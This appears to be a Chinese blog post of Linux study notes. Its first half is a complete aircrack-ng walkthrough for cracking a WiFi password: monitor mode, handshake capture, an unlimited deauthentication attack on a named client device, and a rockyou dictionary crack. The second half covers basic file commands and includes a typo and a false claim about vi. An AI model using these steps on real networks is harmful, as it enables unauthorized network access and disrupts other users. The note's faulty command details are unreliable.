LINUX第2天——基础操作

1. kali破解wifi密码

第一步

插入无线网卡,连接到虚拟机。

ifconfig
  • 看是否出现wlan0

第二步

airmon-ng start wlan0
  • 开启网卡监听模式

第三步

iwconfig
  • 检验,出现wlan0mon则成功

第四步

airodump-ng wlan0mon
  • 扫描
  • BSSID为wifi的MAC地址
  • PWR为信号强弱程度,数值越小信号越强
  • DATA为数据量,越大使用的人就越多
  • CH为信道频率(频道)
  • ESSID为wifi的名称,中文可能会有乱码

第五步

airodump-ng -c 1 -w /home/cbb/桌面/实战项目/实战2-破解wifi密码/test --bssid 7A:F5:8D:B4:BA:B2 wlan0mon
  • airodump-ng -c <AP信道> -w <抓取握手包后存放位置名称> --bssid <AP的mac地址> <interface名称>

第六步

  • 解除认证攻击
  • 保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接。
aireplay-ng -0 0 -a 7A:F5:8D:B4:BA:B2 -c 04:6c:59:97:F4:D2 wlan0mon
  • aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>

  • 带破解的wifi的mac : 7A:F5:8D:B4:BA:B2

  • 用这个wifi的用户 : 04:6c:59:97:F4:D2

  • 出现 : WPA handshake成功

第七步

airmon-ng stop wlan0mon
  • 关闭监听

第八步

gzip -d /usr/share/wordlists/rockyou.txt.gz
  • 解压字典

第九步

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 7A:F5:8D:B4:BA:B2 test-01.cap
  • aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>
    爆破
 KEY FOUND! [ 12345678 ]

2. linux命令的基础操作

2.1 创建文件

  1. 法一:
touch test.txt
  1. 法二:
vi test.txt 或 vim test.txt
  • 这样创建的文件,只可读。
  • 或者只可以用vim来编辑
  • vim输入在后面讲。
  1. 法3:
echo > test.txt
  • echo xxx内容 > test.txt
  • 这样可以直接输入内容。

2.2 创建文件夹

makdir abc

2.3 删除文件

rm -f test.txt
  • rm就是删除的意思。
  • -f意思是删除不提醒。

2.4 移动文件

mv test.txt abc
  • mv 待移动的文件或文件夹 移到的目的文件夹

2.5 复制文件

  • 把mv 改成 cp

2.6 跳转,显示详情

  • 跳转到home文件夹
cd /home
  • 显示home文件夹里面的内容
ls

2.7 vim输入

  • 按 “ i ” 进入编辑模式。
  • 英文状态下,按 Esc ,在输入 “:wq” 保存退出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

姜满月

鼓励,鼓励,更加努力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值